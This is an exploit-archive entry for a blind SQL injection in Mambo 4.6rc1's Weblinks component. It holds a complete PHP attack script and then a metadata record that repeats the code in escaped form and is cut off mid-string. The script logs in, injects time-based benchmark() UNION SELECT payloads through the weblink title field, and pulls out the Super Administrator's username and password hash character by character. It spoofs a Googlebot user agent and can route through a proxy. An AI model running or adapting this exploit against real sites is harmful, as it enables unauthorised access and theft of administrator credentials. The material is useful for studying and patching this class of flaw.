Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
2006-06-17T00:00:00
ID 1337DAY-ID-522 Type zdt Reporter rgod Modified 2006-06-17T00:00:00
Description
Exploit for unknown platform in category web applications
======================================================
Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
======================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to Mambo\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo " -T[prefix] specify a table prefix different from 'mos_'\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /mambo/ username password\r\n";
die;
}
/*
explaination:
sql injection in "title" argument when you submit a web link, poc:
start mysql daemon with log option...
>mysqld --log=mambo.txt
now login, go to "Submit Weblink" feature, in "Name: " field type:
99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*
in mambo.txt we have:
13 Query SELECT id FROM mos_weblinks
WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'
injection is blind but, as you can see, we can you use time delays through Mysql
benchmark() function to ask questions about tables
this works regardless of magic_quotes_gpc settings
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...\r\ncookie -> ".$cookie."\r\n";
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>
# 0day.today [2018-03-01] #
{"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:28:14", "bulletin": {"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:28:14"}}, "hash": "e8dd10441cbe8c60046fbaf71a4ad2ea43d675f5054a167478f36447de7d8d69", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:28:14", "edition": 1, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "http://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data =\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n $endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7aa2323a8c05510e36ec423b400eed59", "key": "sourceHref"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e1c13c78b94a1904a3ac51d669e0dd98", "key": "href"}, {"hash": "fb733324659391a715e8ec8f6ebcccc4", "key": "sourceData"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "8db12d6b291e94cc0663084da9d334bb5f84e6a35d822aeb517931a52898b5a2", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-03-01T23:43:11"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2019:0229"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/WEBEXEC", "MSF:EXPLOIT/WINDOWS/LOCAL/WEBEXEC", "MSF:POST/WINDOWS/ESCALATE/UNMARSHAL_CMD_EXEC", "MSF:EXPLOIT/WINDOWS/LOCAL/MS18_8120_WIN32K_PRIVESC", "MSF:POST/ANDROID/GATHER/SUB_INFO", "MSF:EXPLOIT/SOLARIS/LOCAL/RSH_STACK_CLASH_PRIV_ESC", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION"]}, {"type": "amazon", "idList": ["ALAS-2018-1086"]}, {"type": "saint", "idList": ["SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:F27F2E7D16F4168597CA2B69C38FA30F"]}, {"type": "dsquare", "idList": ["E-631"]}, {"type": "zdt", "idList": ["1337DAY-ID-29989", "1337DAY-ID-29759", "1337DAY-ID-29438", "1337DAY-ID-27679"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310890871"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_4025341.NASL", "EULEROS_SA-2016-1036.NASL"]}, {"type": "korelogic", "idList": ["KL-001-2017-007"]}], "modified": "2018-03-01T23:43:11"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-03-01T23:43:11", "edition": 2, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 17, "cvelist": [], "sourceHref": "https://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data 